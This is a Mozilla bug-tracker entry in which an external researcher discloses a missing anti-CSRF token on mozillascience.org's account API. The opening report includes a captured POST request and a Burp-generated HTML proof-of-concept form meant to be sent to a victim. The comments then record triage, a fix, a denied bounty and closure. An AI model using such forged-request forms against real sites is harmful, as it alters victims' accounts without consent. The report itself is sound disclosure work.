Closed
Bug 1264952
Opened 9 years ago
Closed 3 years ago
Categories
(Mozilla Foundation Communications :: Website, task)
Mozilla Foundation Communications
Website
Tracking
(Not tracked)
RESOLVED
WORKSFORME
People
(Reporter: p4r3sh.p4rm4r, Unassigned)
Details
(Keywords: reporter-external, sec-low, wsec-csrf)
Attachments
(1 file)
|
243 bytes,
text/html
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Steps to reproduce:
While creating a account,
capture request on burp suite.
which is look like this .
POST /api/users/create HTTP/1.1
Host: www.mozillascience.org
bio=test
After that ive created CSRF form
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://www.mozillascience.org/api/users/create"
method="POST">
<input type="hidden" name="bio"
value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
save this form as HTML and send it to victim.
when victim opens it. his/her bio will be change to test.
Actual results:
ANTI CSRF token is missing on this form.
|
||
Comment 1•9 years ago
|
||
Not sure to whom this should go, so... starting by moving off Marketplace to a (hopefully) more monitored product. NI someone who should know better than I.
Group: client-services-security → mozilla-employee-confidential
Component: General → Metrics
Flags: needinfo?(abigail)
Product: Marketplace → Mozilla Foundation
|
||
Comment 3•9 years ago
|
||
Simon: this looks like foundation stuff, would you be able to help us find the right person/project to direct this to for development triage?
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
|
||
Updated•9 years ago
|
Flags: needinfo?(simon)
|
||
Comment 4•9 years ago
|
||
Abby is the best person to do this work. Abby, could you please work with cade and Hannah to get this fixed?
Jonathan, I'm off on PTO for a week and a bit. Feel free to flag :cade for security issues in my absence.
Thanks, Simon
Flags: needinfo?(simon)
|
||
Comment 5•9 years ago
|
||
I've deployed CSRF protection to the site: https://github.com/mozilla/science.mozilla.org/pull/222#issuecomment-213015431
|
|
||
Comment 6•9 years ago
|
||
Thank you for your report.
|
|
||
Comment 8•9 years ago
|
||
Paresh: Thanks for your report. This is not an eligible bounty property. If you're looking for bounties, you should check out the eligible sets on the websec bounty page (https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs). We're planning on adding a bunch of new site to the list soon, but this web property is not slated for addition. Thank you again!
Flags: sec-bounty? → sec-bounty-
|
||
Comment 9•9 years ago
|
||
Reporter asked in email to reconsider the bounty decision.
Flags: sec-bounty- → sec-bounty?
|
||
Comment 10•9 years ago
|
||
I will point out that this is a sec-low rated issue. If that rating is correct, it wouldn't be eligible for a bounty even if it was on a site on the list in comment 8.
|
|
||
Updated•9 years ago
|
Flags: sec-bounty? → sec-bounty-
|
|
||
Comment 11•9 years ago
|
||
This is minused for bounty as a sec-low that isn't on the eligible sites list (both of which would make it ineligible for a bounty).
|
|
||
Updated•9 years ago
|
Flags: needinfo?(abigail)
|
Reporter | |
Comment 12•8 years ago
|
||
|
|
||
Comment 13•3 years ago
|
||
mozillascience.org has been gone for a while, it appears.
Group: mozilla-employee-confidential
Status: NEW → RESOLVED
Closed: 3 years ago
Component: Metrics → Website
Product: Mozilla Foundation → Mozilla Foundation Communications
Resolution: --- → WORKSFORME
|
||
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•